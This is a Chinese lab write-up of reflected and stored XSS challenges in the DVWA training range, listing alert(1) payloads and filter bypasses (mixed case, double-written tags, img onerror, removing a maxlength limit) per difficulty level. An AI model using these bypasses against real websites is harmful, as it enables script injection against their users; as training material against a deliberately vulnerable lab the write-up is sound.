DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法

目录

1.DVWA反射型xss

(1)Low:

(2)Medium:

(3)Heigh

2.xss存储型

(1)Low:

(2)Medium

(3)Heigh


1.DVWA反射型xss

(1)Low:

输入<script>alert(1)</script>

点击submit则会有弹窗显示

(2)Medium:

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

发现<script>被丢掉了,因此考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>=

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

没有弹窗显示

(3)Heigh

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

包含/<script>任意一个字母就会被丢掉

所以不能使用<script>标签去做

所以尝试用<img>

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

2.xss存储型

(1)Low:

输入<script>alert(1)</script>

有弹窗显示

(2)Medium

输入<script>alert(1)</script>

点击提交

没有弹窗

尝试大小写,双写,img,HTML编码均没有反应

那么就尝试换个方向

去改变它的name,尝试在name中注入xss

因为查看源代码时发现neme的长度最大时10

那么我们则需要去修改源代码把maxlength删除,删除之后再在name插入xss代码

考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

没有弹窗显示

(3)Heigh

与中级同理在尝试从message注入不成功后,便转为在name上面注入

尝试用img标签注入

<img src=# οnerrοr=alert(1)>

有弹窗显示

相关推荐

  1. 反射xss常用语法

    2023-12-29 11:25:47       58 阅读
  2. 存储XSS利用方式

    2023-12-29 11:25:47       32 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-29 11:25:47       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-29 11:25:47       101 阅读
  3. 在Django里面运行非项目文件

    2023-12-29 11:25:47       82 阅读
  4. Python语言-面向对象

    2023-12-29 11:25:47       91 阅读

热门阅读

  1. FormData传送复杂数据

    2023-12-29 11:25:47       52 阅读
  2. wpf ComboBox绑定数据及变更事件

    2023-12-29 11:25:47       53 阅读
  3. YOLO手部目标检测

    2023-12-29 11:25:47       58 阅读
  4. WSL2暴露端口给主机

    2023-12-29 11:25:47       52 阅读
  5. 算法练习Day24 (Leetcode/Python-回溯算法)

    2023-12-29 11:25:47       63 阅读
  6. 二、C#基础语法( 控制结构)

    2023-12-29 11:25:47       58 阅读
  7. 小程序webView初始化销毁页面

    2023-12-29 11:25:47       67 阅读
  8. 举例说明自然语言处理(NLP)技术。

    2023-12-29 11:25:47       49 阅读
  9. Decode函数:解码编程中的密码

    2023-12-29 11:25:47       55 阅读
  10. go 语言程序设计第4章--复合数据类型

    2023-12-29 11:25:47       53 阅读